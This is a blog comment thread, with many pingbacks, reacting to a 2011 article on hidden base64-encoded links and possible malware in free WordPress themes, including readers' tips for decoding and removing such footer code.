Pingback: Weekly Linkage: the TSA, Microwaves, and “Dot Dot Dot”
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else « Laboratory B
Reply

Great article! Sometimes free isn’t what it’s cracked up to be :)

Email Templates January 12, 2011 at 3:24 pm
Reply

When I choose a free theme, I always browse the sourcecode and if something seems not clean, I do not use the theme. While many free themes only include backlinks in order to boost the netlinking and the seo of external websites, sometimes the code is more dangerous (hackning purposes…)

Tyseo January 12, 2011 at 3:46 pm
Reply

Amazing amazing post. I am actually shocked that 8 out of the top 10 have malicious code in their themes. I’ll be sure to share this post with my clients!

Thanks again

Conrad Muan January 12, 2011 at 4:00 pm
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else – WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org - 3C Media LLC.
Pingback: links for 2011-01-12 | James A. Arconati
Pingback: Hati-hati Menggunakan Theme WordPress Gratis! « Inside IT:
Reply

Siobahn,

Great post – and always a timely subject.

A note on those encoded links. I’d lay money on them being trojan downloaders – which essentially means, in their case if they are, that you’d be aiding a criminal ring if left there. Same goes for the music downloads site. Long term bad news with Google too (bad link neighborhoods).

(I’d not advise visiting the anti-virus links to find out short of doing so in a virtual machine)

Scott Kane January 13, 2011 at 12:53 am
Reply

What do you think about Theme Forest?

Michael Fever January 13, 2011 at 12:57 am
Pingback: Fail - Being Bitten By FREE WordPress Themes
Pingback: Wordpress temos ir saugumas « praeivio dienoraštis
Reply

That was a very insightful article. Thanks! Nowadays, not only wordpress themes, blogspot themes also contain unnecessary scripts for hiding ads (some ads displayed only on mobile devices) and external links.

JK January 13, 2011 at 1:37 am
Pingback: Lesetipps für den 13. Januar | Netzpiloten.de - das Beste aus Blogs, Videos, Musik und Web 2.0
Reply

Seriously one of the best artilces I’ve ever read. I’m guessing Jay from an earlier comment probably works for one of these companies, because to accuse this post of being shoddy is insulting.

Althought these aren’t guaranteed to contain malicious content, just the fact that something is being hidden is enough to warrant suspicion. If only Google had a way of penalising them.

Daniel January 13, 2011 at 4:47 am
Reply

Good article. For some time now I have been buying my themes (Pagelines or Thesis) – the good thing with this is you get quality, you can get that with free themes as well, but you also get support and regular updates :)

My concern is with google – my question: is google good enough? I think it too hard to get through all the crap if you create original stuff.

I try to publish original iPad wallpapers but the most successful sites are those copying others work (legal or illegal) – weird!

Martin Bay January 13, 2011 at 5:21 am
Pingback: Going viral – UK based Freelance Writer and WordPress Expert | Siobhan Ambrose
Reply

Great work, I have passed this on in my Mozilla Peer2Peer class on WP, thanks again! Oh, I enjoyed your writing style too!!!

joey January 13, 2011 at 6:08 am
Reply

@Michael I’ve not downloaded from Theme Forest but I’ve never heard of any complaints about them. I’ll email them to ask them about their review policy.

@Martin Yeah, it’s a good point about Google. I’ve emailled Google’s press office and tweeted @mattcutts to see if they have any thoughts on the matter.

Google ask people to report spam and paid links:

http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=93713

Google consider the following as spam:

“Hidden text or links. Some webmasters hide links or text on their page with the intention of deceiving search engines about the nature of the content on the page. For example, a casino site could stuff its pages with hidden text such as “labradors, labs” with the intention of tricking search engines into sending dog lovers to a casino page. ”

This means that if you’ve got a theme containing hidden links or text this will negatively affect your SEO.

If you’re downloading from any of these sites you’re not only opening yourself to malware, malicious attacks and spammy links but it could have a detrimental effect on your SEO. Ouch! Not really worth it, is it?

I’m going to follow this post up with something nice on places you should go to for free/cheap themes. If anyone has any recommendations let me know! Either post here or tweet me @SiobhanAmbrose :D

Siobhan Ambrose January 13, 2011 at 6:17 am
Pingback: Interesting read about FREE Wordpress Themes - Graphic Design Forums: UK forums for graphic designers
Reply

Good interpretation and well written, thank you for this article well detailed.

Webmarketing January 13, 2011 at 7:24 am
Reply

Thanks for taking the time to research and create this excellent blog post. I have only used the free themes from wordpress.org so far; but now I will know to be careful before considering the rest.

Rob Kraft January 13, 2011 at 8:35 am
Reply

An easy way of removing the toughest encrypted PHP code is by using the ob_start(), ob_get_content() and ob_end_clean() PHP functions.

E.g

ob_start();

eval(blahblahblahblahblahblahblahblahblahblahblahblah);

$c = ob_get_contents();
ob_end_clean();
echo ‘*start*’.$c.’*end*’;

Then take a look on your site, check out the source and look for the *start* and *end* words. Copy everything in between and remove the junk links. Then replace the eval in your code with the new unencrypted version.

Granted its a little involved, but worth it for a good theme I think.

Matt January 13, 2011 at 8:46 am
Reply

Did you find any ‘malicious code’ in any of these themes?

Ove January 13, 2011 at 9:41 am
Reply

Always beware encoded text in footers, eh?

Andy @ FirstFound January 13, 2011 at 10:53 am
Pingback: Webbtips – 2011/01/13 | Frilansjournalist Anders Thoresson
Reply

It is NOT a violation of the WordPress trademark to use the term in a url any more than using it in the headline of an article would be a violation.

HOWEVER, using it in a domain name IS a violation of the WordPress trademark which means that WordPress could take action against the top two sites in your list and have their domain names revoked. So why isn’t WordPress acting to protect their trademark and the community?

Jim January 13, 2011 at 11:34 am
Reply

Thanks Siobhan. I have to admit that I had never considered that Templates could contain such malware …. I use them but always reprogram them. I shall look a little closer next time to see if my favourite themes and designers do this.

Mark Richards (Webcliq) January 13, 2011 at 11:35 am
Pingback: Lita inte på gratis Wordpressteman | Swegate.se Swegate
Pingback: Security Article on Free Templates - The Wholesale Forums
Pingback: Gefährliche Gratis-Themes für Wordpress! | EGM Weblog
Pingback: Critter’s Code » Blog Archive » Wordpress Theme Authenticity Checker (TAC)
Pingback: padoms: nekad nemeklē bezmaksas wordpress tēmas ar Google | Miks Latvis
Pingback: The Hidden Dangers of Free WordPress Themes | The best Tutorials
Reply

Wow, that was a lot of work. I’ve come across all of those sites and didn’t even stop to consider whether the themes might have malicious code.

I completely agree with your assessments. I can’t think of a single valid reason to have encrypted code inside a WordPress theme, seeing as the code is supposed to be GPLed.

@Jim Wow! That is a powerful point. I guess that’s why some sites use “WP” or “WPMU” instead. But I never even thought about that one. I wonder if WordPress has even thought about pressing the case against those sits.

DavidM January 13, 2011 at 11:12 pm
Reply

This is a great post very detailed. It is better to get your free themes that are listed in wordpress. I have had my troubles finding the perfect theme when I began blogging, I spent hours looking, installing, then uninstalling, and sometimes getting errors.

There are some good free themes, but they did not have everything I desired. I know that I like freedom in customizing my themes.

The back-end on some of these free themes is not always great, I am always wanting more in features. And some of them offer free themes to entice you to buy their premium ones.

I have bought a premium theme that has tons of features in the back-end. I use it on a few of my blogs. It can be a little confusing to look at the back-end with so many features and various ways to customize my site, but I do find it useful to be able to create a theme that looks great, that flows well, and I enjoy the freedom.

I did have some errors in my search. I think that some people may have even stolen the code from some other themes. Because some sites offer free themes where you may see the same theme at a price.

You may be hesitant to buy a premium theme, but it is worth it. You can also find a coupon code on the web that can reduce the price.

Willy Nilly Review January 13, 2011 at 11:33 pm
Pingback: The Hidden Dangers of Free WordPress Themes | 香港新媒體協會
Reply

Thanks for sharing. I knew this. but I never bother to figure it out what is base64 code in the footer. Gonna be more careful when downloading themes.

Adlan Khalidi January 14, 2011 at 2:37 am
Reply

Excellent post, really.

But i miss one point here. How does google read those encrypted links ? I guess he diesn’t ? So what’s the point of inserting it there ?

netgui January 14, 2011 at 3:23 am
Pingback: The Hidden Dangers of Free WordPress Themes Cambodia Phone Market News
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else (Siobhan Ambrose/WPMU.org) | Cooling Dog Bed.info
Pingback: Club Fitness USA
Pingback: Finance Geek » Here’s why you should never search for free WordPress themes on Google or anywhere else. Most of them include backdo…
Pingback: Ilmaiset Wordpress teemat ovat vaarallisia
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else (Siobhan Ambrose/WPMU.org) | BuyElectro.com
Reply

How odd. I must have skimmed right over the title in my initial read. It seems designed to generate controversy. And I just can’t agree with it.

I own and operate http://webstylee.com, where I’ve released a slew of free themes developed using Artisteer. While most of the themes look like they’re from the 1600′s or maybe a little later ( ;) ), they’re nonetheless perfectly safe, as I made them myself.

Given that the site can be found via Google, it and WordPress.org defeat your mean and evil title. Once again, good triumphs over evil! Mwahahaha! Or something like that.

DavidM January 14, 2011 at 8:29 am
Reply

Oh wow, OK that really does make a lot of sense dude.

http://www.being-anon.it.tc

Deen Reen January 14, 2011 at 8:35 am
Reply

@DavidM:

But then, Artiseer presents problems of its own. According to the current Artiseer datasheet, the application only supports WordPress versions 2.5 – 2.7 (March – December 2008), which means that Artiseer-generated Themes are going to be woefully out-of-date with respect to WordPress functionality, and may present any number of issues due to use of deprecated function calls.

Do yourself a favor, and take the next step by freeing yourself from relying on Artiseer. It wouldn’t be that difficult, your Themes will improve, and your users will thank you. (And as a bonus, you’d be able to submit your Themes to the WordPress Theme Repository – should you so choose.)

I’ll even offer to help you, if you’d like!

(p.s. kudos to you, for properly applying the CC-Att license to your Themes without requiring public-facing attribution links! It’s refreshing to see someone not abusing/mis-applying that license.)

Chip Bennett January 14, 2011 at 9:09 am
Reply

Thanks for a really information and eye-opening article. Much appreciated.

Joan Sotkin January 14, 2011 at 9:29 am
Reply

@Jim Good point Re: trademark. I’ll update the post to take account of your comments. Here’s the ref if anyone else is interested: http://wordpress.org/about/domains/

@netgui – I don’t know how Google deals with the encoded links. I suspect that the crawlers do pick them up and sites will rank for them, otherwise there’s no point in them at all.

I’m still waiting to hear back from Google but if I do (fingers crossed) I will report back!

@DavidM I’d like to stress that I’m definitely not making the point that all free WordPress themes are bad. I always use free themes for all sorts of project. The point is that the top ranking websites for free WordPress themes contain encoding. I’m afraid that your own website doesn’t disprove that – I couldn’t find it on the first ten pages of Google.

It’s great that there are sites out there with free WordPress themes for people to use. It’s just incredibly frustrating that they can’t hit the first few pages of Google because these spammy sites are so incredibly good at SEO. It would be great if the WP community could somehow get legitimate sites (like your own) to the front page of Google, instead of these types of websites.

P.S. I would take Chip up on his offer – it’s a good one!!!

Siobhan Ambrose January 14, 2011 at 9:35 am
Reply

@netgui/Siobhan:

Google will never see the links as encoded, but rather only as un-encoded cleartext. Google doesn’t see the underlying PHP files, but rather only the HTML generated from these PHP files by the web server’s PHP parser. The PHP parser takes the PHP file, executes the eval( ‘crap here’) or whatever, and outputs the result.

Basically, Google sees whatever you see if you view-source of a given web page.

Chip Bennett January 14, 2011 at 9:42 am
Pingback: WordPress (not com) Themes: Search and Spam « Changing Way
Reply

@ Chip Bennet:

Regarding Artisteer themes becoming outdated, that’s just inevitable given that rapid nature of WordPress development, but it actually appears to very well support WordPress 3.0 currently, which really only accounts for the menu system.

Sadly, almost all the themes on the Web Stylee site were made pre-Wordpress 2.8 so they don’t have the menu functionality. And I don’t think anyone in their right mind has the time to update 200+ themes. :)

I’m working on my own theme framework currently and generally could use informational help to expedite the process so I very much appreciate the invitation. It seems we also share a love for Scripture so I’m sure we’ll be talking a bit more on your blog.

@ Siohban Ambroe:

I do hope you realize the tongue-in-cheek nature of my comment. I’m rarely to be taken seriously and I very much enjoyed your post. In fact, Web Stylee isn’t really to be taken too seriously either. I was sort of hoping people would end up visiting for the humorous slant behind it all.

DavidM January 14, 2011 at 10:13 am
Reply

@DavidM:

I’ll be happy to help in any way that I can! One of the reasons that I got involved with the WP Theme Review Team was to help more people learn how to develop WordPress Themes. I’m no expert on Frameworks, but feel free to ask away with any questions that you have!

(By the way, once you have your Framework, and a good default Theme, you could very easily take any or all of your Stylee Themes and convert them into Child Themes. Almost every single one can be implemented with CSS changes only.)

Chip Bennett January 14, 2011 at 10:23 am
- Reply
  
  Hi Chip, I just stumbled upon your comments. As one of a small minority of landscape designers committed to ‘the art of eco-friendly gardens’ (the tag line of my business, Indigenous Landscape Design Australia), I’ve decided to stop designing individual gardens. Instead, I aim to earn my income online, by informing/teaching/empowering garden owners, landscape contractors, and other landscape designers, how to achieve beautiful gardens without compromising ecological integrity.
  My online business course mentor, Greg Habstritt (I can highly recommend him: SimpleWealth.com), uses and recommends OptimizePress. But one of my favourite websites, Copyblogger, uses and recommends Genesis. I’ve researched them both, and can’t decide between them.
  I gather that Optimize is customized for (would-be) online marketers like me, whereas Genesis is designed for bricks-and-mortar businesses too. And their otherwise impressive Prose Child Theme, is for blogs rather than full-blown websites.
  Your valued advice would be greatly appreciated. Thank you, Gordon
  
  Gordon Rowland December 21, 2011 at 1:36 am
Reply

The scariest part of this article is that the title could be “Why You Should Never Search For Free WordPress Themes, desktop backgrounds, screensavers, etc, etc , etc…”

The unscrupulous will always find a way to exploit free.

BeBizzy January 14, 2011 at 10:26 am
Pingback: Gratis temaer, pas på! « Unikke Grafiske Danske Temaer til Wordpress
Pingback: Top Stories of the Week – January 7-14, 2011 | Shawn M. Hooper, Ottawa Ontario
Pingback: Why You Should Never Seardch for Free WordPress Themes
Reply

Great article, Siobhan.
I’ve retweeted it and will pass the information on.
Thanks!

TalkAbout Tech January 14, 2011 at 11:50 am
Pingback: Attention aux thèmes Wordpress trouvés sur Google… | Zanskar's Blog
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | The best Tutorials
Reply

Wow, great tips and very good analysis. I’ve always been a fan of free and often tell friends or clients to go to Google to search for free wordpress themes for their blogs, but I’m going to stop doing that right away and go back to check all of my blogs to see if there are any of the things mentioned on this post. It’s sad to see how much people are exploiting WP themes, but I guess when you try to offer something for free you want to get something in return for it. However, the way these sites are going about it is completely wrong.

Sal surra January 14, 2011 at 4:09 pm
Pingback: Links: Happy Birthday, Paul 2011 Edition
Pingback: Links: Happy Birthday, Paul 2011 Edition
Pingback: Halvard Halvorsen’s tumblelog » Daily Digest for January 14th
Pingback: Free WordPress themes | Steven Brady
Reply

Great article. There’s something unsettling though: one of the themes is by Brian Gardner. Isn’t he the creator of the premium StudioPress themes?

Sha January 14, 2011 at 8:19 pm
Reply

It’s probably a knock off or unauthorized. Brian Gardner is a reputable designer.

Harold Mansfield January 14, 2011 at 8:34 pm
Reply

@sha that’s one of the issues. Since open WordPress themes are licensed for free redistribution, anyone can take a theme and modify it (with good or bad intent) and redistribute it. So, the fact that the original designer is reputable doesn’t mean you can trust his/her theme when it’s redistributed by a third party.

Jim January 14, 2011 at 9:11 pm
Reply

this is good stuff. wish I had even known it existed since I have fallen prey to at least 5 bad themes, and just thought it was me, not knowing WP. dern. I feel dumber than usual. Anyway, thanks for the education. Going to spring for a custom site now from someone.

kenn

Kenn Blanchard January 14, 2011 at 9:35 pm
Reply

Excellent piece, Siobhan! A good lesson in being aware of the sites one downloads from. I agree that most people will just search for free WordPress themes (I have done so on many occasions) and I’m glad you’ve pointed out the dangers.

Jack Yan January 14, 2011 at 9:54 pm
Pingback: Link dump for January 14th | The Queue Incorporated
Pingback: Search Blind Spot: WordPress Free Themes : Beyond Search
Reply

Will a review of the top 10 yahoo searches be next?

Tan The Man January 15, 2011 at 1:13 am
Reply

@Siobhan Ambrose, Thanks for the link for TAC wordpress plugin. It did give “Simplefolio” a clean sheet. Yes, I downloaded “Simplefolio” following the links from “Smashing Magazine”. I am bit relaxed now.

Inspirations January 15, 2011 at 1:36 am
Reply

Thanks for the info. This opened my eyes.

Jitesh Golecha January 15, 2011 at 2:00 am
Reply

Also plugings contain base64 code. For example, WPTouch plugin :
/plugins/wptouch/js/fancybox_1.2.5.js:12
I wonder why…

Claude January 15, 2011 at 3:21 am
Reply

@Jim Yep, I’m aware. It’s just that I remember being told that the StudioPress themes aren’t encoded in any way.

@Claude Didn’t know about WPTouch. Damn.

Sha January 15, 2011 at 3:46 am
Pingback: ¿Por qué no debes buscar “Free WordPress Themes” en Google?, Carrero
Pingback: The iBlogPro Wordpress Theme from Pagelines | iPad Wallpapers
Pingback: Recipe for the Perfect Tablet | The Digerati Peninsula
Pingback: Never Download ‘Free’ WordPress Themes via Google | ChurchIT
Pingback: Do Not Make Another Serch For Free Themes In Google | Home for Profits
Reply

This actually quite annoys me.

These links are the only way free theme designers can make anything from the themes. Often, it’s their only source of income.

Using Base64 to encode links is fine – NOT ALWAYS MALICIOUS

James Paterson January 15, 2011 at 9:20 am
Reply

@James Patterson.
If it’s a free theme, how are you making money? But installing the codes and links? That’s garbage!
No one wants to use a theme with code hidden in it.
IF you require advertisers links to stay on the theme, than at least be honest about it.
It’s the dishonestly, assuming that people won’t know any better that breeds the mistrust becuase if you will slip that in on people, what else will you try in the name of a dollar?
This the very reason that I never use free themes, and that I steer everyone I know away from using them.

Don’t blame the messenger, you guys screwed yourself.

Harold Mansfield January 15, 2011 at 10:16 am
Reply

@James Paterson,

If a theme designer can only make money including link-backs in their themes, they’re in the wrong line of business. A theme designer by trade should be able to make more than just free themes. Free themes are simply a promotional tool.

More than that, can you give us one legitimate use of encryption in a free theme? Remember, WordPress theme code is supposed to be GPL because of the WordPress license. One reason is all we need to consider whether it’s “fine” or not.

DavidM January 15, 2011 at 11:31 am
Reply

I am quite new to WP, but having started a new WP blog, my first effort was to find a free WP theme that suits my requirements. Having found them, and installed them I encountered some of the problems explained here. I searched around and found some answers and wrote a post on 25th December. Now I find that the problems are much more serious with some of the WP free thems. My post on the problems I faced can be found here: http://tech-sharing.com/2010/12/harmful-hidden-codes-in-free-wordpress-themes/

Any way, Thanks for this well-researched article, which I will revisit, and used it as a guide for myself and others, especially beginners like me.

Krishna January 15, 2011 at 11:53 am
Reply

@Shioban, you mentioned that you tested 10 sites but I only see 9 of them that were actually actually tested. You make the assumption that themes from wordpress.org are safe but yet just two months ago you showed that assumption to be false.

I agree though that encoded lines are questionable and I stay away from them.

drmike January 15, 2011 at 2:14 pm
Reply

@drmike

I don’t see anything in that previous post that refutes the assertion that Themes downloaded from the WordPress Theme Repository can generally be trusted to be free of malicious code. Can you clarify?

Chip Bennett January 15, 2011 at 2:21 pm
Pingback: Weekly Roundup – 01.09 to 01.15
Reply

Base64 encryption! OH NO!!

Buck Daddy January 15, 2011 at 9:26 pm
Pingback: WordPress community links: Anatomy of a theme edition | WPCandy
Pingback: Sites Sunday, 16 January 2011-Flooding and road closures in Victoria-Techie news: Kinect in 2011-Shift 2 Unleashed launch date-Win7 theme « webDotWiz talks Windows Live
Reply

What about if we search for wordpress themes from the themes section of our wp control panel? Will the free themes we get there be safe for use? Will these themes be checked by wordpress people to be free from malicious and unwanted code?

Thanks for this eye-opening article. It is really disgusting to see how we are being taken for a ride by these template sites.

James Martin January 16, 2011 at 3:49 am
Pingback: מורידים תבניות וורדפרס חינם? היזהרו מדלת אחורית | חורים ברשת
Pingback: Zona Bloguismo LVIV | Bloguismo
Reply

I don’t think this is generally a serious problem. And I don’t agree that the themes are all crap. I’d say maybe 85-90% of them are crap.

When I run into code in the footer, I generally just copy the HTML output and paste it back into the footer. This allows me to make the links a little less obvious by adjusting the color.

I have recently purchased the Thesis Theme and build all my sites on that, but for 2-3 years, I was living almost exclusively off free WP themes with no apparent damage.

c-

Chuck January 16, 2011 at 11:28 am
Pingback: Er óhætt að nota Google til að leita að fríum stílsniðum (e. themes)? « WordPress vefumsjónarkerfið
Pingback: Er góð hugmynd að leita að fríum stílsniðum (e. themes) á Google? « WordPress vefumsjónarkerfið
Pingback: Zentitude » Blog Archive » Des thèmes Wordpress suspects en pagaille sur Google
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else « Rocking the PJs
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else « Rocking the PJs
Pingback: Í nýlegum pistli hjá wpmu.org er farið y… « WordPress vefumsjónarkerfið
Pingback: [External] Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | Online Branding Solutions @ Sridhar Machani.com
Pingback: 無料のブログテーマに仕込まれたマルウェア | 円と生活 365yen
Pingback: Warum ich bestimmte Free-Themes einfach nicht mag
Pingback: #xnytt 17/1 Helsingborg, webbprojekt, ett fritt Sverige och grötekonomi. | Entreprenörsskap, lifehacks och Helsingborg
Pingback: Kosten (maatwerk) WordPress themes Hiranthi's weblog | Hiranthi's weblog - Weblog van een ondernemende vrouw
Pingback: מה יותר מסוכן, להתקין תבניות וורדפרס חינמיות, או לקרוא על אבטחה ב"חורים ברשת"? « מסעותיו של מרק בשבילי החיים
Pingback: Vorsicht bei Gratis Wordpress Themes
Pingback: Beware Sites Offering Free Wordpress Themes | Internet Marketing Blog - Search Engine Optimization, Pay Per Click & More!
Reply

Wow Siobhan
This is some post that you’ve put together.

I don’t pretend to understand the coding involved and I’ll probably never know what a base64 thingy is, but I can see from your super duper detective work that these are very bad themes.

Thanks for highlighting the problem and pointing us in the direction of free trusted themes.

Keith Davis January 17, 2011 at 1:25 pm
Reply

Eye opener!

Manjeet Dahiya January 18, 2011 at 5:02 am
Pingback: How to Find Hidden Malicious Code in Your Free Wordpress Theme | Website Rockstars - How to create online income doing what you love
Pingback: L’Hebdo WordPress : BitDefender Antispam – iOS – Sécurité | Choisir-son-CMS.tk
Pingback: L’Hebdo WordPress : BitDefender Antispam – iOS – Sécurité | Serbouti Mohamed Amine
Reply

As usual, the best resolve is to break down and buy a premium theme. I would never use the garbage available for free download on WordPress.org, nor should anyone who values good, credible web design!

Pixelrage January 18, 2011 at 10:33 am
Reply

Hello
Perfect article !
Thanks

chamomor January 18, 2011 at 10:33 am
Pingback: SFCite | Blog | When is a Free WordPress Theme Really Free? Some Thoughts and Some Places to Find Them
Pingback: Vialaweb 9 - Enlaces vía la web | Nicolás Viroga
Reply

Hi all,

In an effort to convince you that you can still find great free WordPress themes, I’ve written a post about just where you can get them:

http://wpmu.org/when-is-a-free-wordpress-theme-really-free-some-thoughts-and-some-places-to-find-them/

:)

Siobhan Ambrose January 19, 2011 at 5:42 am
Reply

Awesome tips.I have been using free theme from long time.I have to check that whether it is malicious or not.Super like.Thanks buddy.

ankit January 19, 2011 at 10:24 am
Pingback: Do-It-Yourself Do’s and Don’ts | Marketing Solutions 4 Home Professionals
Reply

Fantastic research to drive the message home that one cannot search and download free WP themes, which I’m sure happens all the time. I have posted your message with a link to the full article on my site. Thanks

tinagleisner January 19, 2011 at 3:09 pm
Pingback: Daveo Concept | L’Hebdo WordPress : BitDefender Antispam – iOS – Sécurité
Pingback: Un jour, Sipeasy : la migration du blog Blogspot vers Wordpress et ses obstacles ! (2/2) | Sipeasy.fr
Reply

What a great and helpful article. I have had this issue with a client I used a template that had ‘dodgy’ links at the bottom that linked to porn sites which I managed to decrypt. I have found templates that the decrypter didn’t work on.

You assume the first page Google results are safe to use, how wrong you can be.

I now use blank themes are frameworks to create my themes which work a lot better.

Nebulas Website Design Essex January 21, 2011 at 4:55 am
Pingback: La veille du week-end (treizième) | LoïcG
Pingback: Dangers in Online Templates
Reply

Super article! I’ve had this problem before, but never investigated it to this extent. Thanks!

Lee Cole January 21, 2011 at 6:21 pm
Reply

This was extremely interesting, thanks!

But how about finding out you’re using a tainted theme… and then clean it? I just did exactly that (once you’ve decoded the encoded part, it’s easy to figure out what to do), but I’m not sure where I stand now about the licence. Since they didn’t have the right to taint it… do I have the right to change it?

Baal January 21, 2011 at 7:50 pm
Reply

Some great research and a well written summary of where not to look for free code!

Andy Haynes January 21, 2011 at 9:09 pm
Pingback: SpeedLink 1 – Weekly roundup of relevant stuff out there
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else – WPMU.org — CollinCondray.com
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else – WPMU.org « Collin Condray's WordPress.com Blog
Reply

Thank you Siobhan – This eye opener is much appreciated.

-Chris , Mumbai, India

Christopher W January 22, 2011 at 4:00 pm
Pingback: Free Wordpress themes coming with a price « Wobbits
Reply

Thing is that free WP themes are big link-selling business this days. So it’s most likely not a malicious code hidden there, but simply links to some unrelated 3rd parties who bought the link from the theme author or distributor of the theme. Base64 is there just to stop you from deleting it easily (which you have every right to do according to WP Themes general license terms… themes have to be open-sourced)

ivanhoe January 22, 2011 at 5:45 pm
Pingback: 37prime.news » Free WordPress Theme, a lesson in security.
Pingback: Free WordPress Theme, a lesson in security. « 37prime
Reply

nice article thanks !

Roch January 22, 2011 at 6:46 pm
Pingback: New Wordpress theme suggestion
Pingback: SitePoint Podcast #96: The Plug-in Wars | PHP Podcasts
Pingback: Wordpress : faites attention à la provenance de vos thèmes ! | Airdecker
Reply

Very nice and professional article. very clear information let me stay away from free wordpress themes.

Rene January 23, 2011 at 5:43 am
Reply

You need to get these sites removed from Google’s results then.

http://googleblog.blogspot.com/2010/12/being-bad-to-your-customers-is-bad-for.html

They’ll remove them because obviously their whole goal is to poison google.

http://googleblog.blogspot.com/2011/01/google-search-and-search-engine-spam.html

Tom January 23, 2011 at 6:18 am
Reply

Wow, super article! Thanks for the huge heads-up!

Bert Heymans January 23, 2011 at 9:14 am
Pingback: The obsolescence of web designers « Dot Com Disaster
Reply

Really interesting investigation… probably partly intuitive from the get go, eh? Free is not always REALLY free. Even paid WordPress Themes are not all problem free. I used a one-theme.com theme once and discovered problems in the scripting and the “support” is non-existent. The 1 Theme folks take in your subscription bucks, but they are definitely not home. It’s kind of like a ghost site! The scripting problem could be fixed, but it was not worth the effort when there are themes you can start with that are problem free as you so adeptly pointed out!

Stephen B. Starr January 23, 2011 at 11:43 am
Pingback: Daily Blog Soup
Pingback: how about the fate of flash ?
Reply

Interesting read and I’m glad to have read it. Having given it little thought in the past, I will be far more paranoid going into the future. Guess this post could also apply to plugins that aren’t from the official WordPress site as well. Thanks!

AUDIOMIND January 23, 2011 at 7:36 pm
Pingback: What is the best Wordpress theme from the point of view of SEO? - Quora
Reply

Wow that’s some amazing research, these people are evil.

Callum January 24, 2011 at 1:24 am
Reply

Great post.
However a neat trick to easily see / remove the footer base64 coding is:
- Edit footer.php in wordpress by adding some tekst (above all the rest in the footer). save it
- open the page in your browser, right & view sourcecode, copy the text below your added footertext.
- go back to footer.php in wordpress past what you copied and edit as you wish, it will not show the crap links anymore. and you’re sure you don’t mess up the theme.

grtz

Beno January 24, 2011 at 3:46 am
Pingback: Miasik.net » Niebezpieczne motywy
Pingback: Niebezpieczny kod w szablonach - polska skórka
Reply

Really informative stuff, I paid for my wordpress theme, but I guess that doesn’t automatically make it safe. I’ll be following this up with a bit of digging of my own

Thank you!

Graphic Design Agency Budapest January 24, 2011 at 8:42 am
Pingback: furiousBlog – in my diatribe » Blog Archive » crummy
Pingback: Extraordinarísimo » Blog Archive » Cuidado con los temas gratis para Wordpress
Reply

Have you reported them to Google yet? They could get blacklisted.

Leslie January 24, 2011 at 9:50 am
Pingback: Using stuff you find online | Megan @ Elon
Reply

Thanks! Really useful. Amazing post. Everyday they find new places to hide the sh**
As the previous comment said, reporting to Google would be a good idea.

Cortec20 January 24, 2011 at 12:17 pm
Pingback: Ne jamais télécharger de thèmes Wordpress gratuits via Google - Pressimi
Reply

Who knew there’d be so much ugly in these search results? While I don’t see much of a point for free themes unless it’s for a private site, I would like to amend one additional thought: The people who release these themes free of charge use them to raise their profile. Unauthorised re-release, with or without modification, is really hurting their cause. Their name is usually cut off somewhere or bloggers might blame shifty links on them. I would always recommend either getting themes from their sites directly or from wordpress.org and support the authors if you can.

Berthold January 24, 2011 at 1:37 pm
Reply

The “globalEval” snippets that exploit scanner picks up is from jQuery, which is perfectly safe and running on this very blog.

Martin Seebach January 24, 2011 at 2:47 pm
Reply

Wow, I didn’t know that! Is there an easy way to check a template for evil code? Maybe some tool?

Autismus Kultur January 24, 2011 at 2:53 pm
Pingback: Be Cautious When Searching For Free WordPress Themes | Lifehacker Australia
Pingback: Be careful with free WordPress themes
Reply

Thanks for this great article – looking forward to sharing with colleagues and clients!

2am Webworks January 24, 2011 at 7:05 pm
Reply

Further proof that money spent on a reputable premium theme with full support from its developer is a worthwhile investment.

Excellent resource!!

Char January 24, 2011 at 7:55 pm
Pingback: Fair warning about free Wordpress themes « rhetoftw
Pingback: links for 2011-01-24 at DeStructUred Blog
Pingback: links for 2011-01-24 « Michael B. Duff
Pingback: web design stuff, portfolio - this is a studio blog
Reply

Dreamt last night that I was given a micro pig and kelly osbourne was my sister and picked me up from work on a bus hahaha

Hildegard Swayne January 25, 2011 at 12:02 am
Pingback: Careful of those free WordPress themes! | CNW Iowa Divison in HO Scale
Reply

I like your Free report,Awesome Post.
Thanks!

cashdot. January 25, 2011 at 1:13 am
Pingback: Tech Thoughts Daily Net News – January 25, 2011 | Bill Mullins' Weblog – Tech Thoughts
Reply

I took a long time to come around to the premium themes idea – it was when I realised I was endorsing Casinos and dodgy mobile phone companies.

Try explaining this to people when they first blog and it’s difficult for them to understand, in future I shall just send them here to read this.

Sarah Arrow January 25, 2011 at 11:23 am
Pingback: Searching For Free WordPress Themes? Caution Advised — Jim F Munro
Pingback: Be Cautious When Searching For Free WordPress Themes by Facebook Theme
Pingback: Network Security Podcast » Blog Archive » The Network Security Podcast, Episode 229
Pingback: this n that | What's that you said?
Pingback: 008 – Never Google Search for Free WordPress Themes
Reply

Congratulation for this amazing post.
Very helpfull.
I gona RT hit imédiately

Just tel you the link for “Other codes” is broken

now i bookmark your website ;)

@lordsweetdragon

sweetdragon January 27, 2011 at 3:47 am
Reply

This article really help me. I’m a new WordPress lover and still learn how to build a new template. So far I always do modification free WordPress theme and now after I read your article I should more careful to choose free theme before modification.

Thanks

AnggaRifandi January 27, 2011 at 5:14 am
Reply

You are 100% right. Just last year, in December, I downloaded a virus from a free theme site, before I had a chance to download the theme. So, please be careful.

Marketing Minds January 27, 2011 at 12:41 pm
Pingback: Como procurar Temas WordPress gratuitos
Reply

Thanks for the information. I never thought about that. Very informative article. You rock.

BlogCash January 27, 2011 at 7:43 pm
Reply

Thanks for this article – I found a chunk of Base64 which concealed some questionable links at the bottom of one of my MagPress free themes.

Steve January 27, 2011 at 10:03 pm
Pingback: Theme Authenticity Checker | Savage Lullabye
Pingback: Dangers of Free WordPress Themes | JarvisWP (for Wordpress)
Pingback: Warning! Free wordpress themes may contain malicious code! « Website Design Australia
Reply

i read your article its very informative and useful for me and others too …..

